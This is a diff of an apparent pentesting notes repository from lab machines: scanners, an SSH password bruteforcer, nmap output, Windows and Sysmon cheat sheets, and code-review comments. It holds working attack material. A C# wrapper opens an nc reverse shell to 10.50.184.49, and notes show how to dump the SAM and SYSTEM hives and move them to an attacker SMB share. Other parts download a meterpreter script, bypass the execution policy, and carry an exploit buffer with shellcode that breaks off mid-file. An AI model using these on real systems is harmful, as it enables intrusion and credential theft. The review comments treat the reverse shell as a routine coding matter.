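Review bot: `open("PSTools.zip", 'wb').write(r.content)` never closes the file handle and writes whatever the server returned — including an HTML error page — because the response status is never checked; use `r.raise_for_status()` followed by `with open("PSTools.zip", "wb") as f: f.write(r.content)`. Since this fetches an executable toolset that will be run on other machines, the archive should be verified before use, by comparing against a vendor-published digest (`<EXPECTED_SHA256 from vendor page>`, not present in this commit) or by checking the Authenticode signatures of the extracted binaries, rather than relying on `allow_redirects=True` following wherever the URL points. A one-line comment stating the purpose (download PSTools for offline use) would also make the script self-describing.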
@ -0,0 +1,35 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import socket
|
||||||
|
import pyfiglet
|
||||||
|
|
||||||
|
print(pyfiglet.figlet_format("Port Scanner"))
|
||||||
|
|
||||||
|
ip = sys.argv[1]
|
||||||
|
open_ports = []
|
||||||
|
ports = range(1,10000)
|
||||||
|
|
||||||
|
def probe_port(ip, port, result = 1):
|
||||||
|
try:
|
||||||
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
sock.settimeout(0.5)
|
||||||
|
r = sock.connect_ex((ip,port))
|
||||||
|
if r == 0:
|
||||||
|
result = r
|
||||||
|
sock.close()
|
||||||
|
except Exception as e:
|
||||||
|
pass
|
||||||
|
return result
|
||||||
|
|
||||||
|
for port in ports:
|
||||||
|
sys.stdout.flush()
|
||||||
|
response = probe_port(ip, port)
|
||||||
|
if response == 0:
|
||||||
|
open_ports.append(port)
|
||||||
|
|
||||||
|
if open_ports:
|
||||||
|
print("[+] Open Ports are: ")
|
||||||
|
print(sorted(open_ports))
|
||||||
|
else:
|
||||||
|
print("[-] No Open Ports")
|
|
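Review bot: In `probe_port` the socket is closed only on the success path: if `settimeout` or `connect_ex` raises, `except Exception as e: pass` swallows the error, leaks the descriptor, and never uses `e`. Wrap the socket in `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:` so it is closed on every path, and narrow the handler to `OSError` with the exception logged instead of silently passed. `ports = range(1,10000)` stops at 9999, so port 10000 is never probed — use `range(1, 10001)` if the comment-free intent is 1–10000. Encoding "closed" via the default parameter `result = 1` is unusual; returning the `connect_ex` code directly (or `return r == 0`) would be clearer to the caller that checks `response == 0`.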
@ -0,0 +1,22 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
|
||||||
|
subdomains = []
|
||||||
|
|
||||||
|
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
|
||||||
|
subdomains = _f.read().splitlines()
|
||||||
|
|
||||||
|
for sub in subdomains:
|
||||||
|
http_domain = f"http://{sub}.{sys.argv[1]}"
|
||||||
|
|
||||||
|
try:
|
||||||
|
requests.get(http_domain)
|
||||||
|
|
||||||
|
except requests.ConnectionError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
else:
|
||||||
|
print("Valid domain: ", http_domain)
|
||||||
|
|
|
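Review bot: `requests.get(http_domain)` has no `timeout` and the handler catches only `requests.ConnectionError`, so a `requests.Timeout` or `TooManyRedirects` on one name aborts the whole loop instead of skipping it; use `requests.get(http_domain, timeout=5)` with `except requests.RequestException:`. The hardcoded wordlist path and the unchecked `sys.argv[1]` are the same issues raised on the directory-enumeration script earlier in this commit. The `try`/`except`/`else` structure is fine, but a docstring stating that "valid" here only means a TCP connection succeeded (not that the host served a 2xx) would prevent misreading the output.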
@ -0,0 +1,32 @@
|
||||||
|
# Nikto
|
||||||
|
Scan web server vulnerabilities and more.
|
||||||
|
|
||||||
|
## mmap Input
|
||||||
|
* Pipe or pre run nmap
|
||||||
|
```sh
|
||||||
|
nmap -p80 172.16.0.0/24 -oG - | nikto -h -
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
nmap -oG -Pn -p-10000 10.10.214.141 | nikto -h 10.10.214.141 -p -
|
||||||
|
```
|
||||||
|
|
||||||
|
# Usage
|
||||||
|
|
||||||
|
* Example
|
||||||
|
```
|
||||||
|
nikto -h http://example.com i -p 80,8080
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
nikto -id <user>:<password> -h http://example.com:1234/manager/html
|
||||||
|
```
|
||||||
|
## Plugins
|
||||||
|
```sh
|
||||||
|
nikto -h http://example.com -Plugins apacheusers
|
||||||
|
```
|
||||||
|
|
||||||
|
* List all plugins
|
||||||
|
```sh
|
||||||
|
nikto -list-plugins
|
||||||
|
```
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,4 @@
|
||||||
|
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
|
||||||
|
Host: 10.10.156.247 () Status: Up
|
||||||
|
Host: 10.10.156.247 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49161/open/tcp//unknown///, 49162/open/tcp/////
|
||||||
|
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds
|
|
@ -0,0 +1,19 @@
|
||||||
|
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
|
||||||
|
Nmap scan report for 10.10.156.247
|
||||||
|
Host is up (0.064s latency).
|
||||||
|
Not shown: 64293 closed ports, 1231 filtered ports
|
||||||
|
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
|
||||||
|
PORT STATE SERVICE
|
||||||
|
135/tcp open msrpc
|
||||||
|
139/tcp open netbios-ssn
|
||||||
|
445/tcp open microsoft-ds
|
||||||
|
3389/tcp open ms-wbt-server
|
||||||
|
31337/tcp open Elite
|
||||||
|
49152/tcp open unknown
|
||||||
|
49153/tcp open unknown
|
||||||
|
49154/tcp open unknown
|
||||||
|
49155/tcp open unknown
|
||||||
|
49161/tcp open unknown
|
||||||
|
49162/tcp open unknown
|
||||||
|
|
||||||
|
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds
|
|
@ -0,0 +1,35 @@
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<!DOCTYPE nmaprun>
|
||||||
|
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
|
||||||
|
<!-- Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247 -->
|
||||||
|
<nmaprun scanner="nmap" args="nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247" start="1628704699" startstr="Wed Aug 11 19:58:19 2021" version="7.91" xmloutputversion="1.05">
|
||||||
|
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
|
||||||
|
<verbose level="0"/>
|
||||||
|
<debugging level="0"/>
|
||||||
|
<host starttime="1628704700" endtime="1628704723"><status state="up" reason="user-set" reason_ttl="0"/>
|
||||||
|
<address addr="10.10.156.247" addrtype="ipv4"/>
|
||||||
|
<hostnames>
|
||||||
|
</hostnames>
|
||||||
|
<ports><extraports state="closed" count="64293">
|
||||||
|
<extrareasons reason="resets" count="64293"/>
|
||||||
|
</extraports>
|
||||||
|
<extraports state="filtered" count="1231">
|
||||||
|
<extrareasons reason="no-responses" count="1231"/>
|
||||||
|
</extraports>
|
||||||
|
<port protocol="tcp" portid="135"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="msrpc" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="139"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="netbios-ssn" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="microsoft-ds" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="3389"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="ms-wbt-server" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="31337"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="Elite" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="49152"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="49153"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="49154"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="49155"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="49161"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
|
||||||
|
<port protocol="tcp" portid="49162"><state state="open" reason="syn-ack" reason_ttl="127"/></port>
|
||||||
|
</ports>
|
||||||
|
<times srtt="64161" rttvar="6610" to="100000"/>
|
||||||
|
</host>
|
||||||
|
<runstats><finished time="1628704723" timestr="Wed Aug 11 19:58:43 2021" summary="Nmap done at Wed Aug 11 19:58:43 2021; 1 IP address (1 host up) scanned in 23.92 seconds" elapsed="23.92" exit="success"/><hosts up="1" down="0" total="1"/>
|
||||||
|
</runstats>
|
||||||
|
</nmaprun>
|
|
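--- /dev/null
+++ b/PATH-NOT-SHOWN-1
@@ -0,0 +1,31 @@
+# Shodan
+
+## Checking found Autonomous System Number (ASN)
+* Shodan does output ASN, not necessarily the IP of a small company. Search for
+```h
+asn:AS13335
+```
+* [ASN Check](https://dnschecker.org/asn-whois-lookup.php)
+
+## Banner
+* Example
+```json
+{
+"data": "Moxa Nport Device",
+"Status": "Authentication disabled",
+"Name": "NP5232I_4728",
+"MAC": "00:90:e8:47:10:2d",
+"ip_str": "46.252.132.235",
+"port": 4800,
+"org": "Starhub Mobile",
+"location": {
+"country_code": "SG"
+}
+}
+```
+
+## Filter
+* vulns
+```sh
+vuln:ms17-010
+```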
@ -0,0 +1,38 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import paramiko
|
||||||
|
import sys
|
||||||
|
import os
|
||||||
|
|
||||||
|
target = str(input("IP address: "))
|
||||||
|
username = str(input("Username: "))
|
||||||
|
password_file = str(input("Location of password file: "))
|
||||||
|
|
||||||
|
def ssh_connect(password, code=0):
|
||||||
|
ssh = paramiko.SSHClient()
|
||||||
|
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||||
|
|
||||||
|
try:
|
||||||
|
ssh.connect(target, port=22, username=username, password=password)
|
||||||
|
except paramiko.AuthenticationException:
|
||||||
|
code = 1
|
||||||
|
ssh.close()
|
||||||
|
return code
|
||||||
|
|
||||||
|
with open(password_file, 'rb') as _f:
|
||||||
|
for line in _f.readlines():
|
||||||
|
password = line.strip()
|
||||||
|
print(password)
|
||||||
|
try:
|
||||||
|
response = ssh_connect(password)
|
||||||
|
|
||||||
|
if response == 0 :
|
||||||
|
print("[+] Password Found: " + password.decode())
|
||||||
|
exit(0)
|
||||||
|
if response == 1:
|
||||||
|
print("[-] Nothing Found")
|
||||||
|
except Exception as e:
|
||||||
|
print(e)
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
|
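Review bot: In `ssh_connect`, `ssh.close()` is only reached on success or on `AuthenticationException`; any other error raised by `ssh.connect` (timeout, refused connection, `SSHException`) leaves the client open and falls through to the caller's `except Exception`, which prints it and continues, so a transport failure is indistinguishable from a rejected password in the output. Move the close into a `finally:` block after the `except`, `finally:` / `ssh.close()`, so the client is released on every path, and narrow the outer handler to the errors actually expected (`except (paramiko.SSHException, OSError) as e:`) instead of absorbing everything. `set_missing_host_key_policy(paramiko.AutoAddPolicy())` accepts whatever host key is presented, so the session could be intercepted without notice; `paramiko.RejectPolicy()` together with `ssh.load_system_host_keys()` keeps host-key verification in place. The password file is opened in binary mode, so `print(password)` emits `b'...'` reprs rather than the plain text.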
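--- /dev/null
+++ b/PATH-NOT-SHOWN-2
@@ -0,0 +1 @@
+Subproject commit 3670e5da50b6230166d023c85d9807f8fc1b8e3a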
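--- /dev/null
+++ b/PATH-NOT-SHOWN-3
@@ -0,0 +1,13 @@
+using System;
+using System.Diagnostics;
+
+namespace Wrapper {
+class Program {
+static void Main (){
+Process proc = new Process();
+ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc-mukaa.exe", "10.50.184.49 4447 -e cmd.exe");
+proc.StartInfo = procInfo;
+proc.Start();
+}
+}
+}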
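Review bot: `Process` is `IDisposable` but `proc` is never disposed in `Main`, and `proc.Start()` throws `System.ComponentModel.Win32Exception` when the executable at the hard-coded path is absent, which here surfaces as an unhandled exception. Wrap the object in `using (Process proc = new Process()) { ... }` and catch `Win32Exception` around `proc.Start()` if a clean exit is wanted. Since only `FileName` and `Arguments` are set on the start info, the static `Process.Start(fileName, arguments)` overload expresses the same thing in one line. From the monitoring side, the child process and command line this launches are exactly what the commit's own Logging notes (process creation auditing, Event ID 4688) and Sysmon notes (EventID 3 filtered on DestinationPort) are written to surface, so it makes a useful test case for those filters.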
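--- /dev/null
+++ b/PATH-NOT-SHOWN-4
@@ -0,0 +1,93 @@
+# Logging
+* [Windows Logging CheatSheet](https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/580595db9f745688bc7477f6/1476761074992/Windows+Logging+Cheat+Sheet_ver_Oct_2016.pdf)
+* [NSA -- Spotting Adversary with Windows Event Monitoring](https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm)
+* [Events to Monitor](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor)
+* [Windows 10 Monitoring Reference](https://www.microsoft.com/en-us/download/confirmation.aspx?id=52630)
+
+## Loglevel
+|ID|Event Type|Description|
+|--|----------|-----------|
+|0|Error|An event that indicates a significant problem.|
+|1|Warning|An event that is not necessarily significant.|
+|2|Information|An event describing the successful operation of an application.|
+|3|Success Audit|An event that records an audited security access attempt that is successful.|
+|4|Failure Audit|An event that records an audited security access attempt that is failure.|
+
+## Logrotation
+```sh
+C:\Windows\System32\winevt\Logs
+```
+* As an example, paths can be found under `Microsoft > Windows > PowerShell > Operational` and right click `Properties` in Event Viewer. Logs can be cleared as well in properties.
+
+
+## Tools
+
+* Event Viewer (GUI-based application)
+* Wevtutil.exe (command-line tool)
+* Get-WinEvent (PowerShell cmdlet)
+
+### wevtutil.exe
+```sh
+wevtutil.exe /?
+```
+* Count logs
+```sh
+wevtutil.exe le | measure
+```
+* Read three most recent Application logs
+```sh
+wevtutil qe Application /c:3 /rd:true /f:text
+```
+
+### Get-WinEvent
+* [Online help](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/Get-WinEvent?view=powershell-7.1)
+* List all the logs
+```sh
+Get-WinEvent -ListLog *
+```
+* Find string
+```sh
+Get-WinEvent -Path .\merged.evtx | Where-Object { $_.Message -like '*log clear*' }
+```
+* Further filtering
+```sh
+Get-WinEvent -LogName Application | Where-Object { $_.ProviderName -Match 'WLMS' }
+```
+```sh
+Get-WinEvent -ListProvider *Policy*
+```
+```sh
+(Get-WinEvent -ListProvider Microsoft-Windows-GroupPolicy).Events | Format-Table Id, Description
+```
+* Filter by hashtable values
+```sh
+Get-WinEvent -FilterHashtable @{ LogName='Application'; ProviderName='MsiInstaller' };
+```
+```sh
+Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Select-Object -Property Message | Select-String -Pattern 'SecureString'
+```
+* Including __XPATH__
+```sh
+Get-WinEvent -LogName Application -FilterXPath '*/System/EventID=101 and */System/Provider[@Name="WLMS"]'
+```
+```sh
+Get-WinEvent -LogName Security -FilterXPath '*/EventData/Data[@Name="TargetUserName"]="System"'
+```
+```sh
+Get-WinEvent -LogName Application -FilterXPath '*/System/Provider[@Name="WLMS"] and */System/TimeCreated[@SystemTime="2020-12-15T01:09:08.940277500Z"]' -MaxEvents 1
+```
+* Find login by username
+```sh
+Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4720 and */EventData/Data[@Name="TargetUserName"]="sam"'
+```
+
+### Command Line Logging
+* Enable PS Logging
+```sh
+Local Computer Policy > Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell
+```
+* CLI Process Auditing -- ID 4688
+```
+Local Computer Policy > Computer Configuration > Administrative Templates > System > Audit Process Creation
+```
+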
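--- /dev/null
+++ b/PATH-NOT-SHOWN-5
@@ -0,0 +1,18 @@
+# Manual Windows Enumeration
+
+* `whoami /priv`
+* `whoami /groups`
+* Looking for non-default services:
+```sh
+wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
+```
+* **Unquoted Service Path** Ideally there is a path without quotation
+* Check which account the service the services run as
+```sh
+sc qc <ServiceName>
+```
+* Check if directory is writeable
+```sh
+powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
+```
+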
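--- /dev/null
+++ b/PATH-NOT-SHOWN-6
@@ -0,0 +1,238 @@
+# Powershell Usage
+
+## Get-Help
+```
+Get-Help Command-Name
+```
+* Show examples
+```
+Get-Help Command-Name -Examples
+```
+
+* Get-Command gets all the cmdlets installed on the current Computer.
+```
+Get-Command
+```
+```
+Get-Command Verb-*
+Get-Command Invoke-*
+Get-Command Get-*
+```
+
+## Passing Output via Pipe
+* A pipe passes object including methods and attributes.
+
+```
+Verb-Noun | Get-Member
+```
+```
+Get-Command | Get-Member -MemberType Method
+```
+
+## Creating Objects from Previous Cmdlets
+```
+Get-ChildItem | Select-Object -Property Mode, Name
+```
+* first - gets the first x object
+* last - gets the last x object
+* unique - shows the unique objects
+* skip - skips x objects
+
+## Filtering Objects
+```
+Verb-Noun | Where-Object -Property PropertyName -operator Value
+Verb-Noun | Where-Object {$_.PropertyName -operator Value}
+```
+The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.
+* Where -operator is a list of the following operators:
+
+* -Contains: if any item in the property value is an exact match for the specified value
+* -EQ: if the property value is the same as the specified value
+* -GT: if the property value is greater than the specified value
+
+## Sort Object
+```
+Verb-Noun | Sort-Object
+```
+```
+Get-ChildItem | Sort-Object
+```
+
+## Finding a File
+```
+Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
+```
+```sh
+Get-HotFix | Format-list | findstr <searchstring>
+```
+
+## Showing File Content
+```
+Get-Content 'C:\Program Files\interesting-file.txt'
+```
+
+## Copy File Content
+```sh
+Copy-Item <sourcefile> <destfile>
+```
+
+## Count Lines of Output
+As an example, count all cmdlets on the system
+```
+Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
+```
+
+## Checksum of File
+```
+Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
+```
+
+## Current Working Directory
+```
+Get-Location
+```
+
+## File Metadata
+```sh
+ls | Format-List *
+```
+
+## Web Request
+```sh
+Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
+```
+```sh
+(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
+```
+
+## Base64 Decode File
+```
+[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
+```
+
+## **Circumvent Execution-Policy**
+```sh
+powershell -ExecutionPolicy Bypass -File .\<file>
+```
+```sh
+Set-ExecutionPolicy Bypass -Scope Process
+```
+
+## Enumeration
+
+### Users
+```
+Get-LocalUser
+```
+
+* Password not required users
+```
+Get-LocalUser | Where-Object -Property PasswordRequired -Match false
+```
+
+* SID of users
+```
+Get-WmiObject win32_useraccount | Select name, sid
+```
+
+### Network intel
+* IP Address
+```
+Get-NetIpAddress
+```
+
+* Listening TCP Ports
+```
+Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
+```
+
+* TCP Port by number
+```
+Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
+```
+
+### Patch level and updates
+```
+Get-Hotfix
+```
+* Find patch by HotFixID
+```
+Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
+```
+
+### Find files and Content
+* Find backup files
+```
+Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
+```
+
+* Find file contents
+```
+Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
+```
+
+### Processes
+* Start processes
+```sh
+Start-Process <process>
+```
+
+* Running processes
+```sh
+Get-Process <process>
+```
+* Scheduled Tasks, by TaskName
+```
+Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
+```
+or
+```
+Get-ScheduledTask -TaskName taskname
+```
+
+### Export Output
+* Export as CSV
+```sh
+Get-Process <process> | Export-Csv <output.csv>
+```
+
+### ACL
+* Owner of files
+```
+Get-ACL C:\
+```
+
+### Port Scanner
+```
+for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
+```
+
+### Ping Hosts
+```sh
+1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
+```
+
+### Using Powerview
+```sh
+Import-Module .\powerview.ps1
+Get-NetDomainController
+(Get-NetUser).name
+Get-NetUser -properties description
+Get-NetUser | select -ExpandProperty lastlogon
+Get-NetComputer -ping
+Get-NetGroupMember "Domain Admins"
+Find-DomainShare -CheckShareAccess
+```
+* Enumerate Group Policy
+```sh
+Get-NetGPO
+```
+* Trust relationship to other domains
+```sh
+Get-NetDomainTrust
+```
+* User enumeration
+```sh
+Find-LocalAdminAccess
+```
+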
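--- /dev/null
+++ b/PATH-NOT-SHOWN-7
@@ -0,0 +1,97 @@
+# Sysinternals and CLI usage
+
+## Opening System Properties
+```
+sysdm.cpl
+```
+
+## Installing webdav server,
+
+* Starting windows webclient service
+```
+get-service webclient
+start-service webclient
+```
+
+* Opening NetworkAndSharingCenter
+```
+control.exe /name Microsoft.NetworkAndSharingCenter
+```
+## Make sure Network Discovery is enabled, advanced settings!
+
+```
+Install-WindowsFeature WebDAV-Redirector –Restart
+Get-WindowsFeature WebDAV-Redirector | Format-Table –Autosize
+```
+
+## Sigcheck
+Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a file’s status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning.
+
+* Check for unsigned files in `C:\Windows\system32`
+```
+sigcheck -u -e C:\Windows\System32
+```
+* `-u` "If VirusTotal check is enabled, show files that are unknown by VirusTotal or have non-zero detection, otherwise show only unsigned files."
+* `-e` "Scan executable images only (regardless of their extension)"
+
+## Alternate Data Stream (ADS)
+By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates. (official definition)
+```
+streams file.txt
+
+notepad file.txt:<datastream_name>
+or
+Get-Content -Path .\file.txt -stream ads.txt
+```
+
+## SDelete
+SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk.
+
+
+## TCPView
+TCPView provides a more informative and conveniently presented subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality.
+
+```
+tcpview
+tcpvcon
+```
+
+## Autoruns
+Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more.
+
+## Procdump
+ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.
+
+
+## Procdump
+The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded.
+
+## Procmon
+Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.
+
+## Psexec
+PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems
+
+
+## Winobj
+WinObj is a 32-bit Windows NT program that uses the native Windows NT API (provided by NTDLL.DLL) to access and display information on the NT Object Manager's name space.
+
+## BGInfo
+It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more
+
+## RegJump
+This little command-line applet takes a registry path and makes Regedit open to that path. It accepts root keys in standard (e.g. HKEY_LOCAL_MACHINE) and abbreviated form (e.g. HKLM).
+
+```
+regjump HKLM
+```
+* Similar to
+```
+reg query HKLM
+```
+Get-Item
+Get-ItemProperty
+```
+
+## Strings
+Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.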
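--- /dev/null
+++ b/PATH-NOT-SHOWN-8
@@ -0,0 +1,63 @@
+# Sysmon
+Sysmon gathers detailed and high-quality logs as well as event tracing that assists in identifying anomalies in your environment. Sysmon is most commonly used in conjunction with security information and event management (SIEM) system or other log parsing solutions that aggregate, filter, and visualize events.
+
+## Paths
+* Logfiles
+```
+Applications and Services Logs/Microsoft/Windows/Sysmon/Operational
+```
+
+## Configuration
+* [SwiftOnSecurity](https://github.com/SwiftOnSecurity/sysmon-config)
+* [ION-Storm](https://github.com/ion-storm/sysmon-config/blob/develop/sysmonconfig-export.xml)
+
+## Installation
+```sh
+Downloads-SysInternalsTools C:\Sysinternals
+```
+
+## Best Practices
+* Exclude, not include events
+* CLI gives further control over filters
+```sh
+Get-WinEvent
+```
+```sh
+wevutil.exe
+```
+* Know the env before implementation
+
+## Filtering Events
+* Actions -> Filter Current Log
+
+### Filtering Events with Powershell
+* Logged Events containing port 4444
+```sh
+Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=4444'
+```
+* Logged Events containing lsass.exe
+```sh
+Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=10 and */EventData/Data[@Name="TargetImage"] and */EventData/Data="C:\Windows\system32\lsass.exe"'
+```
+* Rats and C2
+```sh
+Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=<Port>'
+```
+
+## Evasion Techniques
+* Alternate Data Streams
+* Injections
+* Masquerading
+* Packing/Compression
+* Recompiling
+* Obfuscation
+* Anti-Reversing Techniques
+* Remote Thread (OpenThread, ResumeThread)
+
+### Detecting Evasion Techniques with Powershell
+```sh
+Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=15'
+Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=8'
+```
+
+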
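--- /dev/null
+++ b/PATH-NOT-SHOWN-9
@@ -0,0 +1,14 @@
+# Loot Windows Credentials
+
+```sh
+reg.exe save HKLM\SAM sam.bak
+```
+```sh
+reg.exe save HKLM\SYSTEM system.bak
+```
+
+* Exifiltrate and use impacket
+```sh
+examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
+```
+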
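--- /dev/null
+++ b/PATH-NOT-SHOWN-10
@@ -0,0 +1,29 @@
+# Connect to Attacker SMB
+
+## Attacker
+* Impacket smbserver on attacker
+```sh
+sudo examples/smbserver.py share . -smb2support -username <user> -password <password>
+```
+
+## Target
+* Connect to attacker smb
+```sh
+net use \\<attacker-IP>\share /User:<user> <Password>
+```
+* Save data to attacker's smb
+```sh
+move sam.bak \\<attacker-IP>\share\sam.bak
+move system.bak \\<attacker-IP>\share\system.bak
+```
+* Disconnect
+```sh
+net use \\<attacker-IP>\share /del
+```
+
+## Workarounds
+
+* System Error 1312. User credentials need a domain
+```sh
+/USER:domain\user
+```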
@ -0,0 +1,8 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
from __future__ import print_function
|
||||||
|
listRem = "\\x0a".split("\\x")
|
||||||
|
for x in range(1, 256):
|
||||||
|
if "{:02x}".format(x) not in listRem:
|
||||||
|
print("\\x" + "{:02x}".format(x), end='')
|
||||||
|
print()
|
|
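Review bot: `listRem = "\\x0a".split("\\x")` is an indirect way to write the exclusion list; it evaluates to `['', '0a']`, and the empty string can never match a two-digit `"{:02x}"` value, so a literal `listRem = ["0a"]` states the same thing directly and is easier to extend. The `from __future__ import print_function` line is redundant under the `python3` shebang, where `print` is already a function. A one-line module comment would also help a reader, e.g. `# Print \x-escaped byte values 0x01-0xff, skipping any listed in listRem`.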
@ -0,0 +1,65 @@
|
||||||
|
import sys
|
||||||
|
import socket
|
||||||
|
|
||||||
|
badchars = bytearray()
|
||||||
|
listRem = [0x00]
|
||||||
|
for x in range(1, 256):
|
||||||
|
if x not in listRem:
|
||||||
|
badchars.append(x)
|
||||||
|
|
||||||
|
buf = b""
|
||||||
|
buf += b"\xdd\xc0\xd9\x74\x24\xf4\xbe\xd0\xdb\x95\xa8\x5d\x29"
|
||||||
|
buf += b"\xc9\xb1\x52\x31\x75\x17\x83\xc5\x04\x03\xa5\xc8\x77"
|
||||||
|
buf += b"\x5d\xb9\x07\xf5\x9e\x41\xd8\x9a\x17\xa4\xe9\x9a\x4c"
|
||||||
|
buf += b"\xad\x5a\x2b\x06\xe3\x56\xc0\x4a\x17\xec\xa4\x42\x18"
|
||||||
|
buf += b"\x45\x02\xb5\x17\x56\x3f\x85\x36\xd4\x42\xda\x98\xe5"
|
||||||
|
buf += b"\x8c\x2f\xd9\x22\xf0\xc2\x8b\xfb\x7e\x70\x3b\x8f\xcb"
